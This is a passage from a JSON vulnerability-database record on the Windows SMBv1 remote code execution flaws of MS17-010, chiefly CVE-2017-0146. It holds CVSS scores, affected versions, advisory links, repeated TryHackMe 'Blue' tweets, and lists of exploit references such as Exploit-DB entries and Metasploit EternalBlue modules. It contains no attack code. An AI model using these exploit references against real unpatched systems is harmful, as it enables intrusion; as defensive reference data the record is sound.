/hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/uk_NJx/status/1426573521308762112", "text": "Blue - I have just completed this room! Check it out: https://t.co/B1WGZBexHA?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/carlos_o_m/status/1426612611009892352", "text": "Blue - I have just completed this room! Check it out: https://t.co/6jaCHwnUja?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click a trav\u00e9s de /RealTryHackMe"}, {"link": "https://twitter.com/AynRandSucks/status/1429439489068306434", "text": "Blue - I have just completed this room! Check it out: https://t.co/Ypt3f3Ra8A?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/cts_technology/status/1429414666082607108", "text": "Finally!\nBlue - I have just completed this room! Check it out: https://t.co/hJYxVXD4we?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/0x6d61/status/1430147082573074436", "text": "Blue - I have just completed this room! Check it out: https://t.co/08xRz1yFx7?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}], "modified": "2021-04-23T00:07:42"}}, "objectVersion": "1.5", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-200"], "scheme": null, "affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "extraReferences": [{"name": "1037991", "refsource": "SECTRACK", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": ["Third Party Advisory", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "96709", "refsource": "BID", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://www.securityfocus.com/bid/96709"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": ["Third Party Advisory", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "43970", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/43970/"}, {"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "refsource": "CONFIRM", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}], "immutableFields": []}, {"id": "CVE-2017-0146", "bulletinFamily": "NVD", "title": "CVE-2017-0146", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0148.", "published": "2017-03-17T00:59:00", "modified": "2018-06-21T01:29:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0146", "reporter": "secure@microsoft.com", "references": ["http://www.securityfocus.com/bid/96707", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0146"], "type": "cve", "lastseen": "2021-04-23T00:07:42", "history": [{"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2017-0146"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0148.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:36:30", "references": [{"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["SMNTC-96707"], "type": "symantec"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MS:CVE-2017-0146"], "type": "mscve"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "exploitation": {"modified": "2021-02-02T06:36:30", "wildExploited": true, "wildExploitedSources": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}]}, "score": {"modified": "2021-02-02T06:36:30", "rev": 2, "value": 9.5, "vector": "NONE"}, "twitter": {"counter": 55, "modified": "2021-02-02T06:36:30", "tweets": [{"link": "https://twitter.com/Hobbes85ae1/status/1384683091181047808", "text": "Blue - I have just completed this room! Check it out: https://t.co/lqz4GMSKMq?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/jblanko1984/status/1382343441040936960", "text": "Blue - I have just completed this room! Check it out: https://t.co/JR1xhzqLZN?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/dwambia/status/1381683825042931712", "text": "Blue - I have just completed this room! Check it out: https://t.co/6qcJuSTklT?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/Cameron16996962/status/1385269426321231876", "text": "Brute It - I have just completed this room! Check it out: https://t.co/P0vO3cuyJm?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/bruteit?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/ihoruhe/status/1381730384447213573", "text": "Blue - I have just completed this room! Check it out: https://t.co/0vHkuPlF0m?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/yellephen/status/1373222110034759681", "text": "Blue - I have just completed this room! Check it out: https://t.co/WbveSWg8dJ?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/chittomodekinai/status/1376211737238626307", "text": "Blue - I have just completed this room! Check it out: https://t.co/ztz5xEd3UX?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}, {"link": "https://twitter.com/CoolHandSquid/status/1382098669852372992", "text": "Blue - I have just completed this room! Check it out: https://t.co/zCwRy6GPJf?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/_nabeen/status/1381922890770042887", "text": "\u307e\u3060writeup\u307f\u306a\u3044\u3068\u30c0\u30e1\u306d\n\nBlue - I have just completed this room! Check it out: https://t.co/jAlK4M1Ntn?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}, {"link": "https://twitter.com/BELKHIRIKhired1/status/1383176994536456201", "text": "Blue - I have just completed this room! Check it out: https://t.co/eoVe5ak68d?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}]}}, "extraReferences": [{"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146", "refsource": "CONFIRM", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "43970", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/43970/"}, {"name": "1037991", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "96707", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/96707"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}], "hash": "fe5da40eaf24d2f881990299e3b66decb863b04553874a7d4b51f12d91d98d87", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "cde40a13c5d43ca610b08893c2bdb748", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d931342d7091edb0db4db482c531ce39", "key": "cpeConfiguration"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "bf11cde0d5ceb8e4aedc6a3dd6d89286", "key": "description"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "26cf6424f2bdd76a83a3a196b3158794", "key": "references"}, {"hash": "90d3da5cc0f990156ba985c80c37d178", "key": "href"}, {"hash": "dd4a1fba31e29c6988f563bdeb65c80c", "key": "affectedConfiguration"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "b8e67c0bcb3b33cda93643b9d21f6fe8", "key": "extraReferences"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d1b2ee04e6815071fc75b496057c9a52", "key": "title"}], "history": [], "href": 